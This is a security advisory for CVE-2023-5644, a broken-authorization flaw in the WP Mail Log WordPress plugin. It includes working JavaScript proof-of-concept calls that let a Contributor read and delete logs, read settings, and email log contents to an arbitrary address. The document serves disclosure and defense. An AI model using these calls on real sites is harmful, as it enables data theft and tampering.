WP Mail Log < 1.1.3 – Incorrect Authorization in REST API Endpoints | CVE 2023-5644

Description

The plugin does not correctly authorize its REST API endpoints, allowing users with the Contributor role to view and delete data that should only be accessible to Admin users.

Proof of Concept

The following actions may be taken by a Contributor user:
---
/wml_logs - Information leak

Execute the following within a block editor page to read the logs:

await wp.apiFetch({path: 'wml/v1/wml_logs', method: 'POST', data: {pageSize: 10}});
---
/wml_logs/delete - Arbitrary log deletion

Execute the following within a block editor page to delete a log entry, ensuring the `data` array includes a valid ID for a log entry:

await wp.apiFetch({path: 'wml/v1/wml_logs/delete', method: 'POST', data: [1]});
---
/settings

Execute the following within a block editor page to get the plugin settings:

await wp.apiFetch({path: 'wml/v1/settings', method: 'POST', data: {callback: 'get'}});
---
/wml_logs/send_mail

Execute the following on any page of the site to send the information within a log to an arbitrary email address, ensuring the `id` parameter is a valid ID for a log entry.

var nonce = await (await fetch('/wp-admin/admin-ajax.php?action=rest-nonce')).text();

await (await fetch('/wp-json/wml/v1/wml_logs/send_mail', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded', 'X-WP-Nonce': nonce}, body: 'id=1&to_email=send@example.com'})).text();